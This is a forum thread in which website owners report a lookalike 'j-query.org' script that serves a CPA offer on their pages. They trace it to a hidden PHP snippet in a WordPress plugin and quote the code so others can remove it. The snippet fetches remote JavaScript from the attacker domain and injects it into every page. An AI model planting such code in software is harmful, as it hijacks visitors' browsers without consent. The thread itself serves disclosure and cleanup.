j-query hacked?

fellllla

Newbie
Joined
Feb 20, 2010
Messages
42
Reaction score
6
Can anyone explain to me why this

http://www.j-query.org/jquery-1.6.4.min.js


Contains a CPA offer?

This JS is being populated in one of my sites.
 

jazzc

Moderator
Staff member
Moderator
Jr. VIP
Joined
Jan 27, 2009
Messages
3,099
Reaction score
14,692
That is so funny :D

You 've been owned ;)
 

zero-day

Regular Member
Joined
Aug 25, 2011
Messages
349
Reaction score
354
The user above has been banned until he can further explain himself.
 

Xyz01

Regular Member
Joined
Aug 8, 2011
Messages
300
Reaction score
126
Because it's not the official jquery host?

ALWAYS, ALWAYS use jquery.org or the Google CDN.. or better yet host it yourself.
 

m0nster

Senior Member
Joined
Oct 20, 2010
Messages
1,048
Reaction score
1,009
Because it's not the official jquery host?

ALWAYS, ALWAYS use jquery.org or the Google CDN.. or better yet host it yourself.


yes your correct. I'm he did some type of injection/hacking in order to replace the link you had referencing the proper jquery file.

This is not a reflection of CPA infinity as I'm sure you understand now.

User was banned sorry this happened to your site. I'm not a security expert but installing a security plugin if your site is wordpress based might help this guy and others from doing the same thing with a offer from another network
 

zendobi

Newbie
Joined
Jul 21, 2008
Messages
15
Reaction score
15
Well I just noticed it on my site too. Both a link to j-query.org, and another timed redirect right in the very top of the header in all of my php pages. Not that hard to get rid of but still retarded :)
 

artizhay

BANNED
Joined
Nov 21, 2010
Messages
1,868
Reaction score
1,340
Age
30
Lol well that's what you get for going through a non-official site. Makes me want to make my own script, get thousands of people to rely on it, and then change it to a CPA offer. It's ingenious really.
 

zendobi

Newbie
Joined
Jul 21, 2008
Messages
15
Reaction score
15
We arent going thru a non-official site, they are finding a way into wordpress and adding a short but sweet line of code to a plugin.

PHP:
<?php

	if(function_exists('curl_init'))

	{

		$url = "hxxp://"URL"/jquery-1.6.3.min.js"; 

		$ch = curl_init();  

		$timeout = 5;  

		curl_setopt($ch,CURLOPT_URL,$url); 

		curl_setopt($ch,CURLOPT_RETURNTRANSFER,1); 

		curl_setopt($ch,CURLOPT_CONNECTTIMEOUT,$timeout); 

		$data = curl_exec($ch);  

		curl_close($ch); 

		echo "$data";

	}

?>

I do have to admit, that while rather simple it is also kinda smart.
 

martbost

Registered Member
Joined
Mar 10, 2011
Messages
76
Reaction score
183
Found the malicious code in WPZon and removed it from the "amazon.php" file for the plugin. It is at the very bottom of the file and the following should be removed completely.

<?php
if(function_exists('curl_init'))
{
$url = "http://www.j-query.org/jquery-1.6.3.min.js";
$ch = curl_init();
$timeout = 5;
curl_setopt($ch,CURLOPT_URL,$url);
curl_setopt($ch,CURLOPT_RETURNTRANSFER,1);
curl_setopt($ch,CURLOPT_CONNECTTIMEOUT,$timeout);
$data = curl_exec($ch);
curl_close($ch);
echo "$data";
}
?>

Sneaky little Bastard!!!
 
Top